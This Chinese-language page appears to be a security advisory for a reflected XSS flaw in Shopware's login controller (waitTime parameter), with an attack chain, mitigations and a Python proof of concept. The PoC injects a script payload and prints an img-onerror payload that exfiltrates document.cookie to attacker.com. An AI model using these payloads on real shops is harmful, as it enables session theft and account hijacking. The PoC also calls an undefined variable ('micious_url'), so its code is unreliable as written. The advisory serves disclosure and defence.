CVE-2025-67648 CVSS 7.1 高危

Shopware AuthController.php 反射型XSS漏洞 (CVE-2025-67648)

披露日期: 2025-12-11

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-67648

漏洞类型

反射型XSS

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Shopware

漏洞概述

Shopware是一个开源商务平台。该漏洞影响Shopware 6.4.6.0至6.6.10.9版本以及6.7.0.0至6.7.5.0版本。漏洞位于AuthController.php文件中，是一处反射型跨站脚本(XSS)漏洞。攻击者可以通过构造恶意的URL参数，在用户登录页面注入恶意JavaScript代码。当用户访问包含恶意参数的链接时，攻击者可以窃取用户的会话Cookie、劫持用户账户或进行其他恶意操作。该漏洞无需认证即可利用，但需要诱导用户点击恶意链接，属于用户交互型漏洞。CVSS评分7.1，属于高危漏洞。

技术细节

漏洞根源在于AuthController.php中的Storefront登录页面控制器。系统从URL参数中获取waitTime参数值后，直接将该参数渲染到Twig模板中进行输出，而未进行任何输入验证或转义处理。攻击者可以通过在waitTime参数中注入HTML或JavaScript代码，实现任意脚本执行。例如，攻击者构造形如?waitTime=<script>alert(document.cookie)</script>的恶意链接，当目标用户访问该链接时，恶意脚本将在用户浏览器中执行。由于是反射型XSS，恶意代码不会存储在服务器端，而是通过URL参数即时反射给用户。攻击者常通过钓鱼邮件或社交工程手段诱导用户点击此类恶意链接，从而窃取用户凭证或会话信息。

攻击链分析

STEP 1

步骤1

攻击者识别目标站点使用的Shopware版本，确认版本在受影响范围内（6.4.6.0-6.6.10.9或6.7.0.0-6.7.5.0）

STEP 2

步骤2

攻击者构造包含恶意XSS payload的URL，使用waitTime参数注入<script>标签或HTML事件处理器

STEP 3

步骤3

攻击者通过钓鱼邮件、社交媒体或即时通讯工具诱导目标用户点击恶意链接

STEP 4

步骤4

用户浏览器访问恶意URL后，waitTime参数值未经转义直接嵌入到登录页面HTML中

STEP 5

步骤5

浏览器解析HTML时执行注入的恶意JavaScript代码，窃取用户Cookie、会话令牌或其他敏感信息

STEP 6

步骤6

攻击者利用窃取的凭证劫持用户账户，执行未授权操作或进一步渗透系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-67648 PoC - Reflected XSS in Shopware AuthController.php
# Affected Versions: 6.4.6.0 - 6.6.10.9 and 6.7.0.0 - 6.7.5.0
# Fixed Versions: 6.6.10.10 and 6.7.5.1

import requests
import urllib.parse

target_url = "http://target-shopware-site.com/login"

# Malicious payload for XSS injection via waitTime parameter
xss_payload = '<script>alert(document.cookie)</script>'
encoded_payload = urllib.parse.quote(xss_payload)

# Construct malicious URL
malicious_url = f"{target_url}?waitTime={encoded_payload}"

print(f"[*] Target: {target_url}")
print(f"[*] Malicious URL: {malicious_url}")

# Verify vulnerability exists
response = requests.get(micious_url)

if xss_payload in response.text:
    print("[+] VULNERABLE: XSS payload reflected in response")
else:
    print("[-] Not vulnerable or patch already applied")

# Steal cookie payload (for demonstration)
cookie_steal_payload = '<img src=x onerror="fetch(`https://attacker.com/steal?c=`+document.cookie)">'
print(f"[*] Cookie stealing payload: {urllib.parse.quote(cookie_steal_payload)}")

影响范围

Shopware 6.4.6.0 - 6.6.10.9

Shopware 6.7.0.0 - 6.7.5.0

防御指南

临时缓解措施

如无法立即升级，可临时在Web服务器层面配置URL参数过滤规则，拒绝包含<script>、<img>、onerror等XSS特征的请求。同时建议在登录页面添加Content-Security-Policy响应头限制脚本执行，并监控异常登录行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表